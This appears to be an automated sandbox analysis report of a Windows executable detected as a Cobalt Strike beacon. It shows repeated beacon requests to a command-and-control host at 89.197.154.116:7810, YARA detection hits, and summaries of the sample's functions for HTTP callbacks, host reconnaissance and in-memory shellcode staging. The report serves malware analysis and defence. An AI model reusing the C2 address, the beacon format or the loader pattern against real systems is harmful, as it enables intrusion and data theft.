Oct 7, 2024 22:03:56.536883116 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.4	50131	89.197.154.116	7810

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:03:58.254662991 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.4	50132	89.197.154.116	7810

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:04:00.034507990 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.4	50133	89.197.154.116	7810

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:04:01.973644018 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	50134	89.197.154.116	7810

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:04:03.708085060 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.4	50135	89.197.154.116	7810

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:04:07.832915068 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Target ID:	0
Start time:	16:00:00
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\P3KxDOMmD3.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\P3KxDOMmD3.exe"
Imagebase:	0x400000
File size:	328'704 bytes
MD5 hash:	B079E06CA60CF07B35ABD19E225D3E1C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: @VK_Intel Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	11.3%
Total number of Nodes:	319
Total number of Limit Nodes:	19

Executed Functions

Function 00401180 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 196
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 004011E6
SetUnhandledExceptionFilter.KERNEL32 ref: 00401258
malloc.MSVCRT ref: 00401322
strlen.MSVCRT ref: 00401345
malloc.MSVCRT ref: 00401351
memcpy.MSVCRT ref: 00401365
GetStartupInfoA.KERNEL32 ref: 00401463

Strings

@6E, xrefs: 0040125E
0PE, xrefs: 00401490
DCE, xrefs: 0040138E

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
String ID: 0PE$@6E$DCE
API String ID: 649803965-2430247936
Opcode ID: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
Instruction ID: 7b6093c48930a8ef89593839c944e9f908a2e32032a5f35aeb8b435f34b377a6
Opcode Fuzzy Hash: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
Instruction Fuzzy Hash: 5C71ADB5601B0486EB259F56E89476A33A1B745BCAF84803BEF49673E6DF7CC844C348

Function 0066E68C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 165
networkfileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_snprintf.LIBCMT ref: 0066E725

Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E

Part of subcall function 00677B38: _snprintf.LIBCMT ref: 00677CA5

_snprintf.LIBCMT ref: 0066E7BD
_snprintf.LIBCMT ref: 0066E7D4
HttpOpenRequestA.WININET ref: 0066E818
HttpSendRequestA.WININET ref: 0066E84A
InternetQueryDataAvailable.WININET ref: 0066E87A
InternetCloseHandle.WININET ref: 0066E898

Part of subcall function 00672D70: strchr.LIBCMT ref: 00672DD6
Part of subcall function 00672D70: _snprintf.LIBCMT ref: 00672E0C

Part of subcall function 00672C0C: strchr.LIBCMT ref: 00672C69
Part of subcall function 00672C0C: _snprintf.LIBCMT ref: 00672CB3

InternetReadFile.WININET ref: 0066E8D4
InternetCloseHandle.WININET ref: 0066E8F5

Strings

%s%s, xrefs: 0066E7C9
*/*, xrefs: 0066E6CB

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _snprintf$Internet$CloseHandleHttpRequeststrchr$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
String ID: %s%s$*/*
API String ID: 3536628738-856325523
Opcode ID: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
Instruction ID: d172ce45b955779f0415644ddcf92c05ff9dd92b9507bddcc31c82f88435206d
Opcode Fuzzy Hash: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
Instruction Fuzzy Hash: 7B61D236700B8186EB50DF65E4507AEB7A7F785B98F40412AEE4D57B58DF39C50AC700

Function 00675E28 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116
stringCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008

GetUserNameA.ADVAPI32 ref: 00675EAF
GetComputerNameA.KERNEL32 ref: 00675EC2
GetModuleFileNameA.KERNEL32 ref: 00675EDB
strrchr.LIBCMT ref: 00675EED
GetVersionExA.KERNEL32 ref: 00675F10
_snprintf.LIBCMT ref: 00675F9B

Strings

%s%s%s, xrefs: 00675F7F

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
String ID: %s%s%s
API String ID: 1671524875-1891519693
Opcode ID: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
Instruction ID: c28a7dd79399c0947703d9ca336236560d4538fccad7daf3844f32ce664af0b6
Opcode Fuzzy Hash: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
Instruction Fuzzy Hash: 2241D23470468146EA44FB22E92472E779BBB85FD0F848129FE5A0BF55CF3DC1528748

Function 00661184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
encryptionCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32 ref: 006611B8
CryptAcquireContextA.ADVAPI32 ref: 006611DC
CryptGenRandom.ADVAPI32 ref: 006611F0
CryptReleaseContext.ADVAPI32 ref: 00661204

Strings

Microsoft Base Cryptographic Provider v1.0, xrefs: 006611A2, 006611C6
(, xrefs: 006611D4

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$RandomRelease
String ID: ($Microsoft Base Cryptographic Provider v1.0
API String ID: 685801729-4046902070
Opcode ID: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
Instruction ID: f528ba85227e950b9a5ff7247e49097112dbfb7c3d4fe532c91b4787bb7a5fda
Opcode Fuzzy Hash: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
Instruction Fuzzy Hash: D901D83570074182E710CF65E898359B767F7D8F88F488025D74987B24CF79C699C740

Function 00401630 Relevance: 6.0, APIs: 4, Instructions: 50
pipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateNamedPipeA.KERNEL32 ref: 0040167C
ConnectNamedPipe.KERNEL32 ref: 00401699
WriteFile.KERNEL32 ref: 004016BC
CloseHandle.KERNEL32 ref: 004016C9

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: NamedPipe$CloseConnectCreateFileHandleWrite
String ID:
API String ID: 2239253087-0
Opcode ID: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
Instruction ID: 33ab9d0585ac1679f1025b945fed68b18b66da774309cd2c41c4043231b0423c
Opcode Fuzzy Hash: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
Instruction Fuzzy Hash: 431182A1714A5047E7208B12EC4870AB660B785BEAF548635EE5D1BBE4DB7DC445CB08

Function 004017F8 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 54
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 004017B9
SleepEx.KERNELBASE ref: 004017CD

Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784

GetTickCount.KERNEL32 ref: 004017FC
CreateThread.KERNEL32 ref: 00401885

Strings

p, xrefs: 00401821
., xrefs: 00401841
\, xrefs: 00401839
@@, xrefs: 004017AE
e, xrefs: 00401819
p, xrefs: 00401831
\, xrefs: 00401811
i, xrefs: 00401829
%c%c%c%c%c%c%c%c%cMSSE-%d-server, xrefs: 0040185A

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
API String ID: 3660650057-1020837823
Opcode ID: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
Instruction ID: b345380edbdca45ebb9784712c11a19872ab0759f856dd5cf37371eb7f92d9a3
Opcode Fuzzy Hash: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
Instruction Fuzzy Hash: 6A11DFB2214A80C7E714CF62FC4575ABBA0F3C478AF44412AEB091B7A8CB7CC545CB08

Function 0066EA48 Relevance: 9.1, APIs: 6, Instructions: 109
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0067E0FC: RevertToSelf.ADVAPI32 ref: 0067E10A

InternetOpenA.WININET ref: 0066EB0C
InternetSetOptionA.WININET ref: 0066EB2C
InternetSetOptionA.WININET ref: 0066EB44
InternetConnectA.WININET ref: 0066EB7A
InternetSetOptionA.WININET ref: 0066EBB7
InternetSetOptionA.WININET ref: 0066EBE2

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: Internet$Option$ConnectOpenRevertSelf
String ID:
API String ID: 1513466045-0
Opcode ID: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
Instruction ID: a3c04ec4af3ea140744b9b6893a1626f6dc64dd5709c99981c3f251268a58bfe
Opcode Fuzzy Hash: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
Instruction Fuzzy Hash: BD412935300B8182EB54EF51F4A57A977A3F789B88F148019DA4A17B1ADF3EC426CB04

Function 0066CA74 Relevance: 7.8, APIs: 6, Instructions: 296
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008

malloc.LIBCMT ref: 0066CB3B

Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308

Part of subcall function 0067C230: _time64.LIBCMT ref: 0067C254
Part of subcall function 0067C230: malloc.LIBCMT ref: 0067C29C
Part of subcall function 0067C230: strtok.LIBCMT ref: 0067C300
Part of subcall function 0067C230: strtok.LIBCMT ref: 0067C311

Part of subcall function 006734A0: _time64.LIBCMT ref: 006734AE

Part of subcall function 0067EAA8: malloc.LIBCMT ref: 0067EAF8

Part of subcall function 0067EAA8: realloc.LIBCMT ref: 0067EB07

Part of subcall function 0066F3C0: GetLocalTime.KERNEL32 ref: 0066F3DF

malloc.LIBCMT ref: 0066CC4A
_snprintf.LIBCMT ref: 0066CCC1
_snprintf.LIBCMT ref: 0066CCE7
free.LIBCMT ref: 0066CEC6

Part of subcall function 0067AD44: malloc.LIBCMT ref: 0067AD78
Part of subcall function 0067AD44: free.LIBCMT ref: 0067AF2F

Part of subcall function 00678E0C: htonl.WS2_32 ref: 00678E3D
Part of subcall function 00678E0C: htonl.WS2_32 ref: 00678E4A

_snprintf.LIBCMT ref: 0066CD0E

Part of subcall function 0067DA74: Sleep.KERNEL32 ref: 0067DABC
Part of subcall function 0067DA74: ExitThread.KERNEL32 ref: 0067DAC6

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: malloc$_snprintf$_errno_time64freehtonlstrtok$AllocExitHeapLocalSleepThreadTime_callnewhrealloc
String ID:
API String ID: 548016584-0
Opcode ID: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
Instruction ID: 16eebcad59399b91420e8f2b6aaa84d72e3de6bc391615428ee9825792860063
Opcode Fuzzy Hash: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
Instruction Fuzzy Hash: 71A1E17130068146DB98FB72E8657AE23A3BF85790F44913DAE5E4B75ADF39C805C708

Function 0066F014 Relevance: 4.6, APIs: 3, Instructions: 66
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0066F118: WSAStartup.WS2_32 ref: 0066F136

WSASocketA.WS2_32 ref: 0066F042
WSAIoctl.WS2_32 ref: 0066F08F
closesocket.WS2_32 ref: 0066F0EE

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: IoctlSocketStartupclosesocket
String ID:
API String ID: 365704328-0
Opcode ID: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
Instruction ID: 2237a941fd2ae6f7b750c7a65c64ae29eca4d48651673b50a0ea1dd646ee54ff
Opcode Fuzzy Hash: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
Instruction Fuzzy Hash: 72219D727087C083D7208F24F5A075AB7A6F3887E4F648635EE9D43B8ADB39C5568B00

Function 00401595 Relevance: 4.5, APIs: 3, Instructions: 47
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 004015BC
VirtualProtect.KERNEL32 ref: 004015F6
CreateThread.KERNEL32 ref: 0040161B

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: Virtual$AllocCreateProtectThread
String ID:
API String ID: 3039780055-0
Opcode ID: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
Instruction ID: 4860219b4c01c513d172ce07c02c5f666ef61a193e7305fd3c1758593cceafba
Opcode Fuzzy Hash: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
Instruction Fuzzy Hash: 83012B9231558051E7249B73AC04B9AAA91A38DBC9F48C135FE4B5FB65DA3CC145C308

Function 00401704 Relevance: 4.5, APIs: 3, Instructions: 45
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32 ref: 0040174D
ReadFile.KERNEL32 ref: 00401777
CloseHandle.KERNEL32 ref: 00401784

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: File$CloseCreateHandleRead
String ID:
API String ID: 1035965006-0
Opcode ID: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
Instruction ID: 7b1d3a4e01a1f8e2f055cb9d21318694f184940eaf5a18d2a9f539c7fc6a8346
Opcode Fuzzy Hash: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
Instruction Fuzzy Hash: 2401D46531461186E7214B52AC04716B6A0B3D4BE9F648339BFA907BD4DB7DC54ACB08

Function 0066F118 Relevance: 3.0, APIs: 2, Instructions: 42
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 0066F136
WSACleanup.WS2_32 ref: 0066F1D2

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

